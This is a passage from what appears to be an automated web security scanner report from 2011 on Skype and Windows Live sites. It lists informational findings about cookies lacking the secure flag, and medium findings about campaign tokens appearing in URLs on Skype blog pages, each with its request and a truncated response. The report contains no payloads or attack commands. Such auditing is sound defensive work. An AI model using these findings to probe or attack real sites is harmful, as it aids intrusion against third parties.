Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:24 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

7.38. https://login.skype.com/go/tvwebcams  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/tvwebcams

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/tvwebcams HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:18 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

7.39. https://mid.live.com/si/login.aspx/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mid.live.com
Path:   /si/login.aspx/x22

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /si/login.aspx/x22 HTTP/1.1
Host: mid.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2491
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: lc=en-US; path=/
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 04 Sep 2011 21:48:27 GMT
Connection: close

<html>
<head>
<title>Windows Live ID</title>
<meta name="MobileOptimized" content="100"/>
<link type="text/css" rel="stylesheet" href="/hig.css"/>
</head>
<body>
<form id="EmailPasswordForm" na
...[SNIP]...

7.40. https://mid.live.com/si/login.aspx/x3c/cite/x3e/x3cspan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mid.live.com
Path:   /si/login.aspx/x3c/cite/x3e/x3cspan

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /si/login.aspx/x3c/cite/x3e/x3cspan HTTP/1.1
Host: mid.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2560
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: lc=en-US; path=/
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 04 Sep 2011 21:48:29 GMT
Connection: close

<html>
<head>
<title>Windows Live ID</title>
<meta name="MobileOptimized" content="100"/>
<link type="text/css" rel="stylesheet" href="/hig.css"/>
</head>
<body>
<form id="EmailPasswordForm" na
...[SNIP]...

7.41. https://secure.skype.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.skype.com
Path:   /login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login HTTP/1.1
Host: secure.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 21:30:27 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: SC=CC=:CCY=:LC=en:LIM=:TM=1315171827:TS=1314118390:TZ=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:30:27 GMT; path=/; domain=.login.ab-testing
X-Stratus-Processing-Time: 0.0491
Set-Cookie: version=ad0dcdedf8; path=/
Vary: User-Agent,Accept-Encoding
Content-Length: 2331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...

8. Session token in URL  previous  next
There are 25 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


8.1. http://blogs.skype.com/en/2010/06/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://blogs.skype.com
Path:   /en/2010/06/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en/2010/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:35 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 437288
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-dz-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Algeria</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ar-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Argentina</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-au-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Australia</a>
...[SNIP]...
<li>400 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-br-400&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Brazil</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-cm-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Cameroon</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-cl-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Chile</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-dk-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Denmark</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-fr-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in France</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-de-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Germany</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-gh-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Ghana</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-gr-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Greece</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-hn-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-it-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Italy</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-jp-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles in Japan</a>
...[SNIP]...
<li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-mx-120&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Mexico</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-nl-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in the Netherlands</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-nz-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in New Zealand</a>
...[SNIP]...
<li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ng-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Nigeria</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-py-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Paraguay</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-rs-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Serbia</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-pt-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Portugal</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-sk-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Slovakia</a>
...[SNIP]...
<li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-si-120&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Slovenia</a>
...[SNIP]...
<li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-za-120&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in South Africa</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-kr-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in South Korea</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-es-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Spain</a>
...[SNIP]...
<li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ch-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Switzerland</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-gb-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in the UK</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-uy-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Uruguay</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-us-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles in the USA</a>
...[SNIP]...

8.2. http://blogs.skype.com/en/campaigns_and_promotions/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://blogs.skype.com
Path:   /en/campaigns_and_promotions/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en/campaigns_and_promotions/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:01 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 175514
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-dz-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Algeria</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ar-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Argentina</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-au-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Australia</a>
...[SNIP]...
<li>400 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-br-400&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Brazil</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-cm-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Cameroon</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-cl-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Chile</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-dk-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Denmark</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-fr-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in France</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-de-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Germany</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-gh-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Ghana</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-gr-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Greece</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-hn-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-it-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Italy</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-jp-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles in Japan</a>
...[SNIP]...
<li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-mx-120&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Mexico</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-nl-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in the Netherlands</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-nz-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in New Zealand</a>
...[SNIP]...
<li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ng-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Nigeria</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-py-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Paraguay</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-rs-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Serbia</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-pt-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Portugal</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-sk-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Slovakia</a>
...[SNIP]...
<li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-si-120&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Slovenia</a>
...[SNIP]...
<li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-za-120&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in South Africa</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-kr-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in South Korea</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-es-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Spain</a>
...[SNIP]...
<li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ch-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Switzerland</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-gb-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in the UK</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-uy-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Uruguay</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-us-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles in the USA</a>
...[SNIP]...

8.3. http://blogs.skype.com/en/subscriptions/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://blogs.skype.com
Path:   /en/subscriptions/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en/subscriptions/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:19 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 107961
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-dz-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Algeria</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ar-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Argentina</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-au-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Australia</a>
...[SNIP]...
<li>400 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-br-400&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Brazil</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-cm-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Cameroon</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-cl-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Chile</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-dk-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Denmark</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-fr-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in France</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-de-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Germany</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-gh-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Ghana</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-gr-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Greece</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-hn-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-it-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Italy</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-jp-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles in Japan</a>
...[SNIP]...
<li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-mx-120&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Mexico</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-nl-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in the Netherlands</a>
...[SNIP]...
